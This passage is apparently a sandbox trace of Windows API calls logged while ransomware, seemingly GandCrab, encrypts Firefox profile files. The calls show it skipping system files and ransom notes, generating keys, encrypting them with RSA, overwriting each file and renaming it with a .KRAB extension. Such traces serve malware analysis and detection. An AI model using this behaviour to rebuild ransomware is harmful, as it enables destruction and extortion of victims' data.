lpString2="ntuser.dat") returned -1 [0077.250] lstrcmpiW (lpString1="blocklist-addons.json", lpString2="iconcache.db") returned -1 [0077.250] lstrcmpiW (lpString1="blocklist-addons.json", lpString2="bootsect.bak") returned -1 [0077.250] lstrcmpiW (lpString1="blocklist-addons.json", lpString2="boot.ini") returned -1 [0077.250] lstrcmpiW (lpString1="blocklist-addons.json", lpString2="ntuser.dat.log") returned -1 [0077.250] lstrcmpiW (lpString1="blocklist-addons.json", lpString2="thumbs.db") returned -1 [0077.250] lstrcmpiW (lpString1="blocklist-addons.json", lpString2="KRAB-DECRYPT.html") returned -1 [0077.250] lstrcmpiW (lpString1="blocklist-addons.json", lpString2="KRAB-DECRYPT.txt") returned -1 [0077.250] lstrcmpiW (lpString1="blocklist-addons.json", lpString2="CRAB-DECRYPT.txt") returned -1 [0077.250] lstrcmpiW (lpString1="blocklist-addons.json", lpString2="ntldr") returned -1 [0077.250] lstrcmpiW (lpString1="blocklist-addons.json", lpString2="NTDETECT.COM") returned -1 [0077.250] lstrcmpiW (lpString1="blocklist-addons.json", lpString2="Bootfont.bin") returned -1 [0077.250] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x3010000 [0077.251] CryptAcquireContextW (in: phProv=0x338e4b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e4b4*=0x10114e0) returned 1 [0077.283] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0077.284] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0077.284] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0077.284] CryptGenRandom (in: hProv=0x10114e0, dwLen=0x20, pbBuffer=0x338e54c | out: pbBuffer=0x338e54c) returned 1 [0077.284] CryptReleaseContext (hProv=0x10114e0, dwFlags=0x0) returned 1 [0077.284] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.285] CryptAcquireContextW (in: phProv=0x338e4b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e4b4*=0x1010ac8) returned 1 [0077.288] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0077.288] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0077.289] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0077.289] CryptGenRandom (in: hProv=0x1010ac8, dwLen=0x8, pbBuffer=0x338e56c | out: pbBuffer=0x338e56c) returned 1 [0077.289] CryptReleaseContext (hProv=0x1010ac8, dwFlags=0x0) returned 1 [0077.289] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.289] CryptAcquireContextW (in: phProv=0x338e4ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e4ac*=0x10114e0) returned 1 [0077.305] CryptImportKey (in: hProv=0x10114e0, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e4b0 | out: phKey=0x338e4b0*=0x1023678) returned 1 [0077.305] CryptGetKeyParam (in: hKey=0x1023678, dwParam=0x8, pbData=0x338e4a4, pdwDataLen=0x338e4a8, dwFlags=0x0 | out: pbData=0x338e4a4*=0x800, pdwDataLen=0x338e4a8*=0x4) returned 1 [0077.305] CryptEncrypt (in: hKey=0x1023678, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3010000*, pdwDataLen=0x338e4dc*=0xc8, dwBufLen=0x100 | out: pbData=0x3010000*, pdwDataLen=0x338e4dc*=0x100) returned 1 [0077.305] GetLastError () returned 0x0 [0077.305] CryptDestroyKey (hKey=0x1023678) returned 1 [0077.305] CryptReleaseContext (hProv=0x10114e0, dwFlags=0x0) returned 1 [0077.306] CryptAcquireContextW (in: phProv=0x338e4ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e4ac*=0x1010ce8) returned 1 [0077.343] CryptImportKey (in: hProv=0x1010ce8, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e4b0 | out: phKey=0x338e4b0*=0x1023538) returned 1 [0077.349] CryptGetKeyParam (in: hKey=0x1023538, dwParam=0x8, pbData=0x338e4a4, pdwDataLen=0x338e4a8, dwFlags=0x0 | out: pbData=0x338e4a4*=0x800, pdwDataLen=0x338e4a8*=0x4) returned 1 [0077.349] CryptEncrypt (in: hKey=0x1023538, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3010100*, pdwDataLen=0x338e4dc*=0xc8, dwBufLen=0x100 | out: pbData=0x3010100*, pdwDataLen=0x338e4dc*=0x100) returned 1 [0077.350] GetLastError () returned 0x0 [0077.350] CryptDestroyKey (hKey=0x1023538) returned 1 [0077.350] CryptReleaseContext (hProv=0x1010ce8, dwFlags=0x0) returned 1 [0077.350] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\blocklist-addons.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\blocklist-addons.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x7ec [0077.441] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0077.441] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0077.442] ReadFile (in: hFile=0x7ec, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338e57c, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338e57c*=0x70608, lpOverlapped=0x0) returned 1 [0077.585] SetFilePointerEx (in: hFile=0x7ec, liDistanceToMove=0xfff8f9f8, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.585] WriteFile (in: hFile=0x7ec, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x70608, lpNumberOfBytesWritten=0x338e578, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338e578*=0x70608, lpOverlapped=0x0) returned 1 [0077.586] WriteFile (in: hFile=0x7ec, lpBuffer=0x3010000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338e578, lpOverlapped=0x0 | out: lpBuffer=0x3010000*, lpNumberOfBytesWritten=0x338e578*=0x208, lpOverlapped=0x0) returned 1 [0077.586] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.590] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.593] CloseHandle (hObject=0x7ec) returned 1 [0077.614] VirtualFree (lpAddress=0x3010000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.615] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\blocklist-addons.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\blocklist-addons.json"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\blocklist-addons.json.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\blocklist-addons.json.krab")) returned 1 [0077.616] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.616] FindNextFileW (in: hFindFile=0x10230f8, lpFindFileData=0x338e5d0 | out: lpFindFileData=0x338e5d0) returned 1 [0077.616] lstrcmpW (lpString1="blocklist-gfx.json", lpString2=".") returned 1 [0077.616] lstrcmpW (lpString1="blocklist-gfx.json", lpString2="..") returned 1 [0077.616] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\", lpString2="blocklist-gfx.json" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\blocklist-gfx.json") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\blocklist-gfx.json" [0077.616] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0077.617] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\blocklist-gfx.json.KRAB") returned 103 [0077.617] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\blocklist-gfx.json") returned 98 [0077.617] lstrlenW (lpString=".json") returned 5 [0077.617] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x3010000 [0077.617] wsprintfW (in: param_1=0x3010000, param_2="%s " | out: param_1=".json ") returned 6 [0077.617] VirtualFree (lpAddress=0x3010000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.617] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\blocklist-gfx.json") returned 98 [0077.618] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\blocklist-gfx.json") returned 98 [0077.618] lstrcmpiW (lpString1="blocklist-gfx.json", lpString2="desktop.ini") returned -1 [0077.618] lstrcmpiW (lpString1="blocklist-gfx.json", lpString2="autorun.inf") returned 1 [0077.618] lstrcmpiW (lpString1="blocklist-gfx.json", lpString2="ntuser.dat") returned -1 [0077.618] lstrcmpiW (lpString1="blocklist-gfx.json", lpString2="iconcache.db") returned -1 [0077.618] lstrcmpiW (lpString1="blocklist-gfx.json", lpString2="bootsect.bak") returned -1 [0077.618] lstrcmpiW (lpString1="blocklist-gfx.json", lpString2="boot.ini") returned -1 [0077.618] lstrcmpiW (lpString1="blocklist-gfx.json", lpString2="ntuser.dat.log") returned -1 [0077.618] lstrcmpiW (lpString1="blocklist-gfx.json", lpString2="thumbs.db") returned -1 [0077.618] lstrcmpiW (lpString1="blocklist-gfx.json", lpString2="KRAB-DECRYPT.html") returned -1 [0077.618] lstrcmpiW (lpString1="blocklist-gfx.json", lpString2="KRAB-DECRYPT.txt") returned -1 [0077.618] lstrcmpiW (lpString1="blocklist-gfx.json", lpString2="CRAB-DECRYPT.txt") returned -1 [0077.618] lstrcmpiW (lpString1="blocklist-gfx.json", lpString2="ntldr") returned -1 [0077.618] lstrcmpiW (lpString1="blocklist-gfx.json", lpString2="NTDETECT.COM") returned -1 [0077.618] lstrcmpiW (lpString1="blocklist-gfx.json", lpString2="Bootfont.bin") returned -1 [0077.618] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x3010000 [0077.618] CryptAcquireContextW (in: phProv=0x338e4b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e4b4*=0x1010f08) returned 1 [0077.638] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0077.639] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0077.639] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0077.639] CryptGenRandom (in: hProv=0x1010f08, dwLen=0x20, pbBuffer=0x338e54c | out: pbBuffer=0x338e54c) returned 1 [0077.639] CryptReleaseContext (hProv=0x1010f08, dwFlags=0x0) returned 1 [0077.639] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.640] CryptAcquireContextW (in: phProv=0x338e4b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e4b4*=0x1011898) returned 1 [0077.647] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0077.648] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0077.648] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0077.648] CryptGenRandom (in: hProv=0x1011898, dwLen=0x8, pbBuffer=0x338e56c | out: pbBuffer=0x338e56c) returned 1 [0077.648] CryptReleaseContext (hProv=0x1011898, dwFlags=0x0) returned 1 [0077.648] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.649] CryptAcquireContextW (in: phProv=0x338e4ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e4ac*=0x1011568) returned 1 [0077.658] CryptImportKey (in: hProv=0x1011568, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e4b0 | out: phKey=0x338e4b0*=0x1023538) returned 1 [0077.658] CryptGetKeyParam (in: hKey=0x1023538, dwParam=0x8, pbData=0x338e4a4, pdwDataLen=0x338e4a8, dwFlags=0x0 | out: pbData=0x338e4a4*=0x800, pdwDataLen=0x338e4a8*=0x4) returned 1 [0077.658] CryptEncrypt (in: hKey=0x1023538, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3010000*, pdwDataLen=0x338e4dc*=0xc8, dwBufLen=0x100 | out: pbData=0x3010000*, pdwDataLen=0x338e4dc*=0x100) returned 1 [0077.659] GetLastError () returned 0x0 [0077.659] CryptDestroyKey (hKey=0x1023538) returned 1 [0077.659] CryptReleaseContext (hProv=0x1011568, dwFlags=0x0) returned 1 [0077.659] CryptAcquireContextW (in: phProv=0x338e4ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e4ac*=0x10110a0) returned 1 [0077.669] CryptImportKey (in: hProv=0x10110a0, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e4b0 | out: phKey=0x338e4b0*=0x10237b8) returned 1 [0077.669] CryptGetKeyParam (in: hKey=0x10237b8, dwParam=0x8, pbData=0x338e4a4, pdwDataLen=0x338e4a8, dwFlags=0x0 | out: pbData=0x338e4a4*=0x800, pdwDataLen=0x338e4a8*=0x4) returned 1 [0077.669] CryptEncrypt (in: hKey=0x10237b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3010100*, pdwDataLen=0x338e4dc*=0xc8, dwBufLen=0x100 | out: pbData=0x3010100*, pdwDataLen=0x338e4dc*=0x100) returned 1 [0077.669] GetLastError () returned 0x0 [0077.670] CryptDestroyKey (hKey=0x10237b8) returned 1 [0077.670] CryptReleaseContext (hProv=0x10110a0, dwFlags=0x0) returned 1 [0077.670] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\blocklist-gfx.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\blocklist-gfx.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x7ec [0077.672] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0077.672] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0077.673] ReadFile (in: hFile=0x7ec, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338e57c, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338e57c*=0x6d31, lpOverlapped=0x0) returned 1 [0077.721] SetFilePointerEx (in: hFile=0x7ec, liDistanceToMove=0xffff92cf, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.721] WriteFile (in: hFile=0x7ec, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x6d31, lpNumberOfBytesWritten=0x338e578, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338e578*=0x6d31, lpOverlapped=0x0) returned 1 [0077.721] WriteFile (in: hFile=0x7ec, lpBuffer=0x3010000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338e578, lpOverlapped=0x0 | out: lpBuffer=0x3010000*, lpNumberOfBytesWritten=0x338e578*=0x208, lpOverlapped=0x0) returned 1 [0077.721] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.727] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.727] CloseHandle (hObject=0x7ec) returned 1 [0077.729] VirtualFree (lpAddress=0x3010000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.730] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\blocklist-gfx.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\blocklist-gfx.json"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\blocklist-gfx.json.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\blocklist-gfx.json.krab")) returned 1 [0077.731] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.731] FindNextFileW (in: hFindFile=0x10230f8, lpFindFileData=0x338e5d0 | out: lpFindFileData=0x338e5d0) returned 1 [0077.732] lstrcmpW (lpString1="blocklist-plugins.json", lpString2=".") returned 1 [0077.732] lstrcmpW (lpString1="blocklist-plugins.json", lpString2="..") returned 1 [0077.732] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\", lpString2="blocklist-plugins.json" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\blocklist-plugins.json") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\blocklist-plugins.json" [0077.732] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0077.732] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\blocklist-plugins.json.KRAB") returned 107 [0077.732] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\blocklist-plugins.json") returned 102 [0077.732] lstrlenW (lpString=".json") returned 5 [0077.732] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x3010000 [0077.732] wsprintfW (in: param_1=0x3010000, param_2="%s " | out: param_1=".json ") returned 6 [0077.733] VirtualFree (lpAddress=0x3010000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.733] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\blocklist-plugins.json") returned 102 [0077.733] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\blocklist-plugins.json") returned 102 [0077.733] lstrcmpiW (lpString1="blocklist-plugins.json", lpString2="desktop.ini") returned -1 [0077.733] lstrcmpiW (lpString1="blocklist-plugins.json", lpString2="autorun.inf") returned 1 [0077.733] lstrcmpiW (lpString1="blocklist-plugins.json", lpString2="ntuser.dat") returned -1 [0077.733] lstrcmpiW (lpString1="blocklist-plugins.json", lpString2="iconcache.db") returned -1 [0077.733] lstrcmpiW (lpString1="blocklist-plugins.json", lpString2="bootsect.bak") returned -1 [0077.733] lstrcmpiW (lpString1="blocklist-plugins.json", lpString2="boot.ini") returned -1 [0077.733] lstrcmpiW (lpString1="blocklist-plugins.json", lpString2="ntuser.dat.log") returned -1 [0077.733] lstrcmpiW (lpString1="blocklist-plugins.json", lpString2="thumbs.db") returned -1 [0077.733] lstrcmpiW (lpString1="blocklist-plugins.json", lpString2="KRAB-DECRYPT.html") returned -1 [0077.733] lstrcmpiW (lpString1="blocklist-plugins.json", lpString2="KRAB-DECRYPT.txt") returned -1 [0077.733] lstrcmpiW (lpString1="blocklist-plugins.json", lpString2="CRAB-DECRYPT.txt") returned -1 [0077.733] lstrcmpiW (lpString1="blocklist-plugins.json", lpString2="ntldr") returned -1 [0077.734] lstrcmpiW (lpString1="blocklist-plugins.json", lpString2="NTDETECT.COM") returned -1 [0077.734] lstrcmpiW (lpString1="blocklist-plugins.json", lpString2="Bootfont.bin") returned -1 [0077.734] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x3010000 [0077.734] CryptAcquireContextW (in: phProv=0x338e4b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e4b4*=0x1010a40) returned 1 [0077.738] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0077.738] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0077.738] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0077.738] CryptGenRandom (in: hProv=0x1010a40, dwLen=0x20, pbBuffer=0x338e54c | out: pbBuffer=0x338e54c) returned 1 [0077.738] CryptReleaseContext (hProv=0x1010a40, dwFlags=0x0) returned 1 [0077.738] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.739] CryptAcquireContextW (in: phProv=0x338e4b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e4b4*=0x10115f0) returned 1 [0077.744] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0077.744] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0077.744] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0077.744] CryptGenRandom (in: hProv=0x10115f0, dwLen=0x8, pbBuffer=0x338e56c | out: pbBuffer=0x338e56c) returned 1 [0077.744] CryptReleaseContext (hProv=0x10115f0, dwFlags=0x0) returned 1 [0077.745] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.745] CryptAcquireContextW (in: phProv=0x338e4ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e4ac*=0x1011700) returned 1 [0077.751] CryptImportKey (in: hProv=0x1011700, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e4b0 | out: phKey=0x338e4b0*=0x1023538) returned 1 [0077.751] CryptGetKeyParam (in: hKey=0x1023538, dwParam=0x8, pbData=0x338e4a4, pdwDataLen=0x338e4a8, dwFlags=0x0 | out: pbData=0x338e4a4*=0x800, pdwDataLen=0x338e4a8*=0x4) returned 1 [0077.751] CryptEncrypt (in: hKey=0x1023538, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3010000*, pdwDataLen=0x338e4dc*=0xc8, dwBufLen=0x100 | out: pbData=0x3010000*, pdwDataLen=0x338e4dc*=0x100) returned 1 [0077.751] GetLastError () returned 0x0 [0077.751] CryptDestroyKey (hKey=0x1023538) returned 1 [0077.751] CryptReleaseContext (hProv=0x1011700, dwFlags=0x0) returned 1 [0077.751] CryptAcquireContextW (in: phProv=0x338e4ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e4ac*=0x1010ce8) returned 1 [0077.755] CryptImportKey (in: hProv=0x1010ce8, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e4b0 | out: phKey=0x338e4b0*=0x10237b8) returned 1 [0077.755] CryptGetKeyParam (in: hKey=0x10237b8, dwParam=0x8, pbData=0x338e4a4, pdwDataLen=0x338e4a8, dwFlags=0x0 | out: pbData=0x338e4a4*=0x800, pdwDataLen=0x338e4a8*=0x4) returned 1 [0077.755] CryptEncrypt (in: hKey=0x10237b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3010100*, pdwDataLen=0x338e4dc*=0xc8, dwBufLen=0x100 | out: pbData=0x3010100*, pdwDataLen=0x338e4dc*=0x100) returned 1 [0077.755] GetLastError () returned 0x0 [0077.755] CryptDestroyKey (hKey=0x10237b8) returned 1 [0077.755] CryptReleaseContext (hProv=0x1010ce8, dwFlags=0x0) returned 1 [0077.755] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\blocklist-plugins.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\blocklist-plugins.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x7ec [0077.756] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0077.757] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0077.757] ReadFile (in: hFile=0x7ec, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338e57c, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338e57c*=0x312c0, lpOverlapped=0x0) returned 1 [0077.791] SetFilePointerEx (in: hFile=0x7ec, liDistanceToMove=0xfffced40, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.791] WriteFile (in: hFile=0x7ec, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x312c0, lpNumberOfBytesWritten=0x338e578, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338e578*=0x312c0, lpOverlapped=0x0) returned 1 [0077.792] WriteFile (in: hFile=0x7ec, lpBuffer=0x3010000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338e578, lpOverlapped=0x0 | out: lpBuffer=0x3010000*, lpNumberOfBytesWritten=0x338e578*=0x208, lpOverlapped=0x0) returned 1 [0077.792] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.796] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.797] CloseHandle (hObject=0x7ec) returned 1 [0077.801] VirtualFree (lpAddress=0x3010000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.801] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\blocklist-plugins.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\blocklist-plugins.json"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\blocklist-plugins.json.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\blocklist-plugins.json.krab")) returned 1 [0077.802] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.803] FindNextFileW (in: hFindFile=0x10230f8, lpFindFileData=0x338e5d0 | out: lpFindFileData=0x338e5d0) returned 1 [0077.803] lstrcmpW (lpString1="blocklist.xml", lpString2=".") returned 1 [0077.803] lstrcmpW (lpString1="blocklist.xml", lpString2="..") returned 1 [0077.803] lstrcatW 